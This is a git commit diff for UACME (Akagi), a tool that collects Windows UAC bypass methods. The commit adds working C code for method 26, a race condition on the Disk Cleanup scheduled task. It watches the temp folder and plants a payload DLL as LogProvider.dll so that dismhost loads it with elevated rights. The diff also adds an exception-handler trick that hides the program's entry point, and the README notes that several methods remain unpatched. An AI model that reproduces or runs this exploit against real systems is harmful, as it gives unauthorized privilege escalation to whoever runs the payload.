v 2.5.4

Enigma0x3 DiskCleanup method integrated as #26
2017-02-08 00:37:31 +07:00 · 2017-02-08 00:37:31 +07:00 · 769ade07ba
parent 7e23b232bc
commit 769ade07ba
14 changed files with 339 additions and 45 deletions
--- a/Compiled/Akagi32.exe
+++ b/Compiled/Akagi32.exe
--- a/Compiled/Akagi64.exe
+++ b/Compiled/Akagi64.exe
--- a/README.md
+++ b/README.md
@ -37,7 +37,8 @@ Keys (watch debug ouput with dbgview or similar for more info):
 * 22 - Hybrid method, abusing SxS DotLocal and targeting consent to gain system privileges, works from Windows 7 up to 10rs2 15025;
 * 23 - Hybrid method, abusing Package Manager and DISM, works from Windows 7 up to 10rs2 15025;
 * 24 - Original Comet method from BreakingMalware, abuses current user environment variables and CompMgmtLauncher.exe, works from Windows 7 up to 10rs2 15025;
-* 25 - Original method from Enigma0x3, abuses shell command execution logic used by autoelevated applications, works from Windows 7 up to 10rs2 15025.
+* 25 - Original method from Enigma0x3, abuses shell command execution logic used by autoelevated applications, works from Windows 7 up to 10rs2 15025;
 * 26 - Original method from Enigma0x3, abuses race condition with quite idiotic cleanmgr.exe behavior, works on from Windows 10th1 10240 up to 10rs2 15025.
 Note:
 * Several methods require process injection, so they won't work from wow64, use x64 edition of this tool;
@ -83,7 +84,7 @@ Methods fixed:
 * 18 - Windows 10 RS1 starting from public 14371 build;
 * 19 - Windows 10 RS1 starting from public 14376 build.
-** 20, 21, 22, 23, 24, 25 are not fixed as at 02 February 2017.
+** 20, 21, 22, 23, 24, 25, 26 are not fixed as at 08 February 2017.
 If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus)
 https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
@ -102,8 +103,8 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
 # VirusTotal reference report
-* Akagi32 https://www.virustotal.com/en/file/caf744d38820accb48a6e50216e547ed2bb3979604416dbcfcc991ce5e18f4ca/analysis/
+* Akagi32 https://www.virustotal.com/en/file/8100847e1066b04615a7ab2c2b919b70d75e96d1900b2f7a03896579f5f1982b/analysis/
-* Akagi64 https://www.virustotal.com/en/file/609e9b15114e54ffc40c05a8980cc90f436a4a77c69f3e32fe391c0b130ff1c5/analysis/
+* Akagi64 https://www.virustotal.com/en/file/5e453253add4e1b2a0a63c3a2ea2a45631f99e45d2e1dce96159766a30c73333/analysis/
 # Build 
@ -119,6 +120,7 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
 * KernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643
 * Command Injection/Elevation - Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited
 * "Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking, https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
 * Bypassing UAC on Windows 10 using Disk Cleanup, https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
 # Authors
--- a/Source/Akagi/Resource.rc
+++ b/Source/Akagi/Resource.rc
--- a/Source/Akagi/consts.h
+++ b/Source/Akagi/consts.h
@ -4,9 +4,9 @@
 *
 *  TITLE:       CONSTS.H
 *
-*  VERSION:     2.53
+*  VERSION:     2.54
 *
-*  DATE:        18 Jan 2017
+*  DATE:        07 Feb 2017
 *
 *  Global consts definition file.
 *
@ -27,6 +27,8 @@
 #define CMD_EXTRACT_WINSAT          L"/c wusa %ws /extract:%%windir%%\\system32\\sysprep"
 #define CMD_EXTRACT_MIGWIZ          L"/c wusa %ws /extract:%%windir%%\\system32\\migwiz"
 #define T_SCHTASKS_CMD              L"/run /tn \"\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup\" /i"
 #define T_CLSID_ShellSecurityEditor L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}"
 #define T_IID_ISecurityEditor       L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}"
 #define ISECURITYEDITOR_ELEMONIKER  L"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}" 
@ -59,6 +61,8 @@
 #define DEVOBJ_DLL                  L"devobj.dll"
 #define UNBCL_DLL                   L"unbcl.dll"
 #define DISMCORE_DLL                L"dismcore.dll"
 #define LOGPROVIDER_DLL             L"LogProvider.dll"
 #define PROVPROVIDER_DLL            L"ProvProvider.dll"
 #define CLICONFG_EXE                L"cliconfg.exe"
 #define OOBE_EXE                    L"oobe.exe"
 #define WINSAT_EXE                  L"winsat.exe"
@ -74,6 +78,7 @@
 #define SPINSTALL_EXE               L"spinstall.exe"
 #define CONSENT_EXE                 L"consent.exe"
 #define EVENTVWR_EXE                L"eventvwr.exe"
 #define SCHTASKS_EXE                L"schtasks.exe"
 #define COMPMGMTLAUNCHER_EXE        L"CompMgmtLauncher.exe"
 #define PKGMGR_EXE                  L"pkgmgr.exe"
 #define SYSPREP_DIR                 L"sysprep\\"
@ -100,6 +105,7 @@
 #define LAZYWOW64UNSUPPORTED        L"Use 32 bit version of this tool on 32 bit OS version"
 #define OSTOOOLD                    L"This method require Windows 7 and above"
 #define WINBLUEWANTED               L"This method require Windows 8 and above"
 #define WIN10ONLY                   L"This method require Windows 10 and above"
 #define UACFIX                      L"This method fixed/unavailable in the current version of Windows, do you still want to continue?"
 #define T_AKAGI_KEY                 L"Software\\Akagi"
 #define T_AKAGI_PARAM               L"LoveLetter"
--- a/Source/Akagi/enigma0x3.c
+++ b/Source/Akagi/enigma0x3.c
@ -4,15 +4,16 @@
 *
 *  TITLE:       ENIGMA0X3.C
 *
-*  VERSION:     2.53
+*  VERSION:     2.54
 *
-*  DATE:        18 Jan 2017
+*  DATE:        07 Feb 2017
 *
-*  Enigma0x3 autoelevation method.
+*  Enigma0x3 autoelevation methods.
-*  Used by unnamed MSIL malware.
+*  Used by various malware.
 *
 *  For description please visit original URL
 *  https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
 *  https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
 *
 * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -101,3 +102,172 @@ BOOL ucmHijackShellCommandMethod(
    return bResult;
 }
 /*
 * ucmDiskCleanupWorkerThread
 *
 * Purpose:
 *
 * Worker thread.
 *
 */
 DWORD ucmDiskCleanupWorkerThread(
    LPVOID Parameter
 )
 {
    BOOL                        bCond = FALSE;
    NTSTATUS                    status;
    HANDLE                      hDirectory = NULL, hEvent = NULL;
    SIZE_T                      sz;
    PVOID                       Buffer = NULL;
    LPWSTR                      fp = NULL;
    UACMECONTEXT               *Context = (UACMECONTEXT *)Parameter;
    FILE_NOTIFY_INFORMATION    *pInfo = NULL;
    UNICODE_STRING              usName;
    IO_STATUS_BLOCK             IoStatusBlock;
    OBJECT_ATTRIBUTES           ObjectAttributes;
    WCHAR                       szFileName[MAX_PATH * 2], szTempBuffer[MAX_PATH];
    do {
        RtlSecureZeroMemory(&usName, sizeof(usName));
        if (!RtlDosPathNameToNtPathName_U(Context->szTempDirectory, &usName, NULL, NULL))
            break;
        InitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, 0, NULL);
        status = NtCreateFile(&hDirectory, FILE_LIST_DIRECTORY | SYNCHRONIZE,
            &ObjectAttributes,
            &IoStatusBlock,
            NULL,
            FILE_OPEN_FOR_BACKUP_INTENT,
            FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
            FILE_OPEN,
            FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
            NULL,
            0
        );
        if (!NT_SUCCESS(status))
            break;
        sz = 1024 * 1024;
        Buffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sz);
        if (Buffer == NULL)
            break;
        InitializeObjectAttributes(&ObjectAttributes, NULL, 0, 0, NULL);
        status = NtCreateEvent(&hEvent, EVENT_ALL_ACCESS, &ObjectAttributes, NotificationEvent, FALSE);
        if (!NT_SUCCESS(status))
            break;
        do {
            status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL,
                &IoStatusBlock, Buffer, (ULONG)sz, FILE_NOTIFY_CHANGE_DIR_NAME | FILE_NOTIFY_CHANGE_FILE_NAME, TRUE);
            if (status == STATUS_PENDING)
                NtWaitForSingleObject(hEvent, TRUE, NULL);          
            pInfo = (FILE_NOTIFY_INFORMATION*)Buffer;
            for (;;) {
                if (pInfo->Action == FILE_ACTION_ADDED) {
                    RtlSecureZeroMemory(szTempBuffer, sizeof(szTempBuffer));
                    _strncpy(szTempBuffer, MAX_PATH, pInfo->FileName, pInfo->FileNameLength / sizeof(WCHAR));
                    if ((szTempBuffer[8] == L'-') &&      //
                        (szTempBuffer[13] == L'-') &&     // If GUID form directory name.
                        (szTempBuffer[18] == L'-') &&     //
                        (szTempBuffer[23] == L'-'))
                    {
                        //If it is file after LogProvider.dll
                        fp = _filename(szTempBuffer);
                        if (_strcmpi(fp, PROVPROVIDER_DLL) == 0) {
                            RtlSecureZeroMemory(szFileName, sizeof(szFileName));
                            _strcpy(szFileName, Context->szTempDirectory);
                            fp = _filepath(szTempBuffer, szTempBuffer);
                            if (fp) {
                                _strcat(szFileName, fp); //slash on the end
                                _strcat(szFileName, LOGPROVIDER_DLL);
                                supWriteBufferToFile(szFileName, Context->PayloadDll, Context->PayloadDllSize);                                
                            }
                            status = STATUS_NO_SECRETS;
                        } //_strcmpi
                    } //guid test
                } //Action
                if (status == STATUS_NO_SECRETS)
                    break;
                pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset);
                if (pInfo->NextEntryOffset == 0)
                    break;
                NtSetEvent(hEvent, NULL);
            }
        } while (NT_SUCCESS(status));
    } while (bCond);
    if (usName.Buffer) {
        RtlFreeUnicodeString(&usName);
    }
    if (hDirectory != NULL)
        NtClose(hDirectory);
    if (hEvent)
        NtClose(hEvent);
    if (Buffer != NULL)
        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Buffer);
    return 0;
 }
 /*
 * ucmDiskCleanupRaceCondition
 *
 * Purpose:
 *
 * Use cleanmgr innovation implemented in Windows 10+.
 * Cleanmgr.exe uses full copy of dismhost.exe from local %temp% directory.
 * RC friendly.
 *
 */
 BOOL ucmDiskCleanupRaceCondition(
    VOID
 )
 {
    BOOL                bResult = FALSE;
    DWORD               ti;
    HANDLE              hThread = NULL;
    SHELLEXECUTEINFOW   shinfo;
    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmDiskCleanupWorkerThread, &g_ctx, 0, &ti);
    if (hThread) {
        RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
        shinfo.cbSize = sizeof(shinfo);
        shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
        shinfo.lpFile = SCHTASKS_EXE;
        shinfo.lpParameters = T_SCHTASKS_CMD;
        shinfo.nShow = SW_SHOW;
        if (ShellExecuteExW(&shinfo)) {
            if (shinfo.hProcess)
                WaitForSingleObject(shinfo.hProcess, INFINITE);
                CloseHandle(shinfo.hProcess);
        }
        //
        // Because cleanmgr.exe is slow we need to wait enough time until it will try to launch dismhost.exe
        // It may happen very fast or really slow depending on resources usage.
        // Well lets hope 10 min is enough.
        //
        if (WaitForSingleObject(hThread, 60000 * 10) == WAIT_OBJECT_0)
            bResult = TRUE;
        CloseHandle(hThread);
    }
    return bResult;
 }
--- a/Source/Akagi/enigma0x3.h
+++ b/Source/Akagi/enigma0x3.h
@ -4,9 +4,9 @@
 *
 *  TITLE:       ENIGMA0X3.H
 *
-*  VERSION:     2.53
+*  VERSION:     2.54
 *
-*  DATE:        18 Jan 2017
+*  DATE:        07 Feb 2017
 *
 *  Prototypes and definitions for Enigma0x3 autoelevation method.
 *
@ -22,3 +22,7 @@ BOOL ucmHijackShellCommandMethod(
    _In_opt_ LPWSTR lpszPayload,
    _In_ LPWSTR lpszTargetApp
    );
 BOOL ucmDiskCleanupRaceCondition(
    VOID
    );
--- a/Source/Akagi/global.h
+++ b/Source/Akagi/global.h
@ -6,7 +6,7 @@
 *
 *  VERSION:     2.53
 *
-*  DATE:        18 Jan 2017
+*  DATE:        20 Jan 2017
 *
 *  Common header file for the program support routines.
 *
@ -79,6 +79,7 @@ typedef enum _UACBYPASSMETHOD {
    UacMethodDISM,
    UacMethodComet,
    UacMethodEnigma0x3,
    UacMethodEnigma0x3_2,
    UacMethodMax
 } UACBYPASSMETHOD;
@ -123,4 +124,11 @@ typedef struct _UACME_CONTEXT {
    WCHAR               szTempDirectory[MAX_PATH + 1]; //with end slash
 } UACMECONTEXT, *PUACMECONTEXT;
 typedef UINT(WINAPI *pfnEntryPoint)();
 typedef struct _UACME_THREAD_CONTEXT {
    TEB_ACTIVE_FRAME Frame;
    pfnEntryPoint ucmMain;
 } UACME_THREAD_CONTEXT, *PUACME_THREAD_CONTEXT;
 extern UACMECONTEXT g_ctx;
--- a/Source/Akagi/main.c
+++ b/Source/Akagi/main.c
@ -4,9 +4,9 @@
 *
 *  TITLE:       MAIN.C
 *
-*  VERSION:     2.53
+*  VERSION:     2.54
 *
-*  DATE:        18 Jan 2017
+*  DATE:        07 Feb 2017
 *
 *  Program entry point.
 *
@ -23,6 +23,7 @@
 #pragma comment(lib, "comctl32.lib")
 UACMECONTEXT g_ctx;
 TEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, "=^_^=" };
 static pfnDecompressPayload pDecryptPayload = NULL;
@ -146,7 +147,6 @@ UINT ucmInit(
        TempWindow = CreateWindowEx(WS_EX_TOPMOST, WndClassName, WndTitleName,
            WS_VISIBLE | WS_POPUP | WS_CLIPCHILDREN | WS_CLIPSIBLINGS, 0, 0, 30, 30, NULL, NULL, inst, NULL);
        //remember dll handles
        g_ctx.hKernel32 = GetModuleHandleW(KERNEL32_DLL);
        if (g_ctx.hKernel32 == NULL) {
@ -524,6 +524,16 @@ UINT ucmMain()
    case UacMethodEnigma0x3:
        break;
    case UacMethodEnigma0x3_2:
 #ifndef _DEBUG
        if (g_ctx.dwBuildNumber < 10240) {
            ucmShowMessage(WIN10ONLY);
            return ERROR_UNSUPPORTED_TYPE;
        }
 #endif
        break;
    }
    //prepare command for payload
@ -531,7 +541,10 @@ UINT ucmMain()
    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
    GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &paramLen);
    if (paramLen > 0) {
-        if ((g_ctx.Method != UacMethodRedirectExe) && (g_ctx.Method != UacMethodComet)) {
+        if ((g_ctx.Method != UacMethodRedirectExe) && 
            (g_ctx.Method != UacMethodComet) && 
            (g_ctx.Method != UacMethodEnigma0x3)) 
        {
            supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
        }
    }
@ -579,7 +592,7 @@ UINT ucmMain()
        }
 #endif
        if (MessageBox(GetDesktopWindow(),
-            TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
+            TEXT("This method will permanently TURN UAC OFF, are you sure?"),
            PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
        {
            if (ucmSimdaTurnOffUac()) {
@ -779,13 +792,74 @@ UINT ucmMain()
        }
        break;
    case UacMethodEnigma0x3_2:
        if (ucmDiskCleanupRaceCondition()) {
            return ERROR_SUCCESS;
        }
        break;
    }
    return ERROR_ACCESS_DENIED;
 }
 DWORD g_ExCookie = 0;
 LONG NTAPI ucmVehHandler(
    EXCEPTION_POINTERS *ExceptionInfo
 )
 {
    UACME_THREAD_CONTEXT *uctx;
    if (ExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_SINGLE_STEP)
        if (ExceptionInfo->ExceptionRecord->ExceptionFlags == g_ExCookie) {
            uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame();
            while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) {
                uctx = (UACME_THREAD_CONTEXT *)uctx->Frame.Previous;
            }
            if (uctx) {
                if (uctx->ucmMain)
                    uctx->ucmMain();
            }
            ExceptionInfo->ContextRecord->EFlags |= 0x10000;
            return EXCEPTION_CONTINUE_EXECUTION;
        }
    return EXCEPTION_CONTINUE_SEARCH;
 }
 /*
 * main
 *
 * Purpose:
 *
 * Program entry point.
 *
 */
 VOID main()
 {
-    ExitProcess(ucmMain());
+    PVOID ExceptionHandler;
    DWORD k;
    EXCEPTION_RECORD ex;
    UACME_THREAD_CONTEXT uctx;
    RtlSecureZeroMemory(&uctx, sizeof(uctx)); 
    ExceptionHandler = RtlAddVectoredExceptionHandler(1, &ucmVehHandler);
    if (ExceptionHandler) {
        uctx.Frame.Context = &g_fctx;
        uctx.ucmMain = (pfnEntryPoint)ucmMain;
        RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);
        k = ~GetTickCount();
        g_ExCookie = RtlRandomEx(&k);
        RtlSecureZeroMemory(&ex, sizeof(ex));
        ex.ExceptionFlags = g_ExCookie;
        ex.ExceptionCode = (DWORD)STATUS_SINGLE_STEP;
        RtlRaiseException(&ex);
        RtlRemoveVectoredExceptionHandler(ExceptionHandler);
        RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx);
    }
    ExitProcess(0);
 }
--- a/Source/Akagi/sup.c
+++ b/Source/Akagi/sup.c
@ -6,7 +6,7 @@
 *
 *  VERSION:     2.53
 *
-*  DATE:        18 Jan 2017
+*  DATE:        19 Jan 2017
 *
 * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -506,10 +506,9 @@ VOID supMasqueradeProcess(
    VOID
    )
 {
-    SIZE_T  sz = 0x1000;
+    SIZE_T  sz;
    PPEB    Peb = g_ctx.Peb;
    DWORD   cch;
-    WCHAR   szBuffer[MAX_PATH + 1];
+    WCHAR   szBuffer[MAX_PATH * 2];
    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    cch = GetWindowsDirectory(szBuffer, MAX_PATH);
@ -518,18 +517,19 @@ VOID supMasqueradeProcess(
        _strcat(szBuffer, L"\\explorer.exe");
        g_lpszExplorer = NULL;
        sz = 0x1000;
        NtAllocateVirtualMemory(NtCurrentProcess(), &g_lpszExplorer, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (g_lpszExplorer) {
            _strcpy(g_lpszExplorer, szBuffer);
-            RtlEnterCriticalSection(Peb->FastPebLock);
+            RtlEnterCriticalSection(g_ctx.Peb->FastPebLock);
-            RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer);
+            RtlInitUnicodeString(&g_ctx.Peb->ProcessParameters->ImagePathName, g_lpszExplorer);
-            RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, APPCMDLINE);
+            RtlInitUnicodeString(&g_ctx.Peb->ProcessParameters->CommandLine, APPCMDLINE);
-            RtlLeaveCriticalSection(Peb->FastPebLock);
+            RtlLeaveCriticalSection(g_ctx.Peb->FastPebLock);
-            LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb);
+            LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)g_ctx.Peb);
        }
    }
 }
@ -706,6 +706,9 @@ VOID NTAPI sxsFindDllCallback(
    do {
        if ((sctx == NULL) || (DataTableEntry == NULL))
            break;
        if ((DataTableEntry->BaseDllName.Buffer == NULL) ||
            (DataTableEntry->FullDllName.Buffer == NULL))
            break;
--- a/Source/Akagi/uacme.vcxproj
+++ b/Source/Akagi/uacme.vcxproj
@ -186,6 +186,9 @@
    <Manifest>
      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>
    </Manifest>
    <PostBuildEvent>
      <Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi32.exe</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
@ -223,6 +226,9 @@
    <Manifest>
      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>
    </Manifest>
    <PostBuildEvent>
      <Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi64.exe</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemGroup>
    <ClCompile Include="..\Shared\cmdline.c" />
--- a/Source/Akagi/uacme.vcxproj.user
+++ b/Source/Akagi/uacme.vcxproj.user
@ -9,11 +9,11 @@
    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LocalDebuggerCommandArguments>24</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>26</LocalDebuggerCommandArguments>
    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LocalDebuggerCommandArguments>25</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>26</LocalDebuggerCommandArguments>
    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
  </PropertyGroup>
 </Project>
--- a/Source/Shared/ntos.h
+++ b/Source/Shared/ntos.h
@ -4,9 +4,9 @@
 *
 *  TITLE:       NTOS.H
 *
-*  VERSION:     1.51
+*  VERSION:     1.53
 *
-*  DATE:        18 Jan 2017
+*  DATE:        06 Feb 2017
 *
 *  Common header file for the ntos API functions and definitions.
 *
@ -4559,6 +4559,10 @@ ULONG NTAPI RtlRemoveVectoredExceptionHandler(
 	_In_ PVOID Handle
 	);
 VOID NTAPI RtlRaiseException(
    _In_ PEXCEPTION_RECORD
    );
 VOID NTAPI RtlPushFrame(
 	_In_ PTEB_ACTIVE_FRAME Frame
 	);
@ -5380,6 +5384,18 @@ NTSTATUS NTAPI NtQueryDirectoryFile(
 	_In_		BOOLEAN RestartScan
 	);
 NTSTATUS NTAPI NtNotifyChangeDirectoryFile(
    _In_        HANDLE FileHandle,
    _In_opt_    HANDLE Event,
    _In_opt_    PIO_APC_ROUTINE ApcRoutine,
    _In_opt_    PVOID ApcContext,
    _Out_       PIO_STATUS_BLOCK IoStatusBlock,
    __out_bcount(Length) PVOID Buffer,
    _In_        ULONG Length,
    _In_        ULONG CompletionFilter,
    _In_        BOOLEAN WatchTree
 );
 NTSTATUS NTAPI NtQuerySection(
 	_In_		HANDLE SectionHandle,
 	_In_		SECTION_INFORMATION_CLASS SectionInformationClass,
@ -5888,6 +5904,11 @@ NTSTATUS NTAPI NtCreateEvent(
 	_In_		BOOLEAN InitialState
 	);
 NTSTATUS NTAPI NtSetEvent(
    _In_        HANDLE EventHandle,
    _Out_opt_   PLONG PreviousState
    );
 NTSTATUS NTAPI NtAllocateVirtualMemory(
 	_In_        HANDLE ProcessHandle,
 	_Inout_     PVOID *BaseAddress,
--- a/UACME.sha256
+++ b/UACME.sha256
@ -1,5 +1,5 @@
-caf744d38820accb48a6e50216e547ed2bb3979604416dbcfcc991ce5e18f4ca *Compiled\Akagi32.exe
+8100847e1066b04615a7ab2c2b919b70d75e96d1900b2f7a03896579f5f1982b *Compiled\Akagi32.exe
-609e9b15114e54ffc40c05a8980cc90f436a4a77c69f3e32fe391c0b130ff1c5 *Compiled\Akagi64.exe
+5e453253add4e1b2a0a63c3a2ea2a45631f99e45d2e1dce96159766a30c73333 *Compiled\Akagi64.exe
 098e6b9ca3c24b8d3dc8c2eb1a8ed8a07ca7248de1395e0ab4b515ff55a6eae4 *Source\uacme.sln
 8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
 02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
@ -14,30 +14,30 @@ e087dfb09004d72749ffa94e016860683a7c20f147346e1acf0f561da400e9f1 *Source\Akagi\b
 ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h
 fce0f9f17b98675ea322c9f1729c73c56467fbb68335e86417517e6fd549f630 *Source\Akagi\compress.c
 be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h
-6b91a330d0364f46649103359ac5b5151bfce528e071bf359f2d70fb1fed7120 *Source\Akagi\consts.h
+6371bbc89d908cef5ee47fc436227cfa8f7d2dd026436832fb23fcde6eb18a17 *Source\Akagi\consts.h
-12ab1a9c817e811b9bc717bd0d97a7c4ccd1fcf1aff3286f8678b469c1f705f5 *Source\Akagi\enigma0x3.c
+bb21e48947918f6c73659f2987fbb59740e341beee1266973bb12786eefa6b16 *Source\Akagi\enigma0x3.c
-68ca3022e53c0cd73faf2e6f890ff3442c6026145d6443d435ff515baa89a894 *Source\Akagi\enigma0x3.h
+362c2c8c0aeb6ed6396fffb1d06f5b83ac03b74c75845da0cab4702311863520 *Source\Akagi\enigma0x3.h
-149439592460c97be0ec568a9fee2108389e7ef274897574e2833ffb2fae0213 *Source\Akagi\global.h
+069d647a1453a78d20c8ae7f0d0b45554a0df26bdb4b4df3ba6ec964cc0b5df3 *Source\Akagi\global.h
 5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c
 c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
 8761ed178e2a91e89bc1421a903f82f10364bbb598fa519178a4f324b6b97f65 *Source\Akagi\hybrids.c
 81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h
-ee302f5456d5d997bf85636f1d116e0492782e826f768cc64285e74e3304e50e *Source\Akagi\main.c
+4999f2124a97ddd4bd4535a4bf8367b38c381c8452b7bb51a7465eb7ce676697 *Source\Akagi\main.c
 dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c
 67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h
 d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h
 3cbe32882a569f18c57ee3cbeaf05c9cecfcf4674fd3292a990cd46e63b87045 *Source\Akagi\pitou.c
 7f8aec0ef71310198ba697c1acc8bdeff64279b039b82c6761f110bbd92e6dfb *Source\Akagi\pitou.h
 c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
-bfec6d928158f2f4d8de2f9b509dd6e46a0b6993db64ceb2734ed848e8f48314 *Source\Akagi\Resource.rc
+eaadd82fbc9ceb272e5afbeb5843371aaf4fdb2af961262b6ff88db4aa117192 *Source\Akagi\Resource.rc
 d84490cd98b484bb0e8af241df7500efef502525ec7249aa6a5b6f850e2bac77 *Source\Akagi\simda.c
 9d25bcd377d6bc86332ac613cd99362c9881302d403a3e4e1e8c93a266982b32 *Source\Akagi\simda.h
 41af5a0b6ae9d510689410c183cb30537ec30084a32620d5734675ff780bdf5c *Source\Akagi\sirefef.h
-a1b963ca686e4b595ae23ca18296e5f2b8190f5a7feece7faba8c0be4fe26acc *Source\Akagi\sup.c
+796b444a8afdf16455d6c8de01d55737ba5113ac6a935f1f829dccfed445dbee *Source\Akagi\sup.c
 247b69ae74d383d57c33a9db45ed18f436e0db9e918e0c8216267a1b91488cec *Source\Akagi\sup.h
-f822ad0e3793d6da0823af18df42d36855f957303a86b9600b9f3051f03a6156 *Source\Akagi\uacme.vcxproj
+03b45c6826f71e3320ed58561291407730b1abe54ca4bfa1534496d2522da3ab *Source\Akagi\uacme.vcxproj
 00e5a7fa7a42ee0a196f9f8391dd32afae69cc6d6aa9d573ef3a2c32b82ba495 *Source\Akagi\uacme.vcxproj.filters
-fc119d09e357972a5b3f5914510d126b8563efb741bea05c21104d9b15c3006b *Source\Akagi\uacme.vcxproj.user
+52738d01f69a34e4c143d38d3fdf7bb5cd9fddb288f29da0bbcd705e49cd4a44 *Source\Akagi\uacme.vcxproj.user
 087f64ac18b054724e683d0ef92a885e19a8e1fe43405d71144ac9692b58e21a *Source\Akagi\bin\Fubuki32.cd
 dd5c530a8c5a7d80ed541cafa566ed2af664bac6ea558fbe0773378ecc837e85 *Source\Akagi\bin\Fubuki64.cd
 0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd
@ -80,7 +80,7 @@ abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Na
 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
 bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
 107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
-4d545749c75f9d3aa7502b7056956912488feede3f5879178a91a9c32a2df0ab *Source\Shared\ntos.h
+dd9325113e26f117347a388ecbe50497bb0fd8111ced6510fa854dd36fe58f23 *Source\Shared\ntos.h
 b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
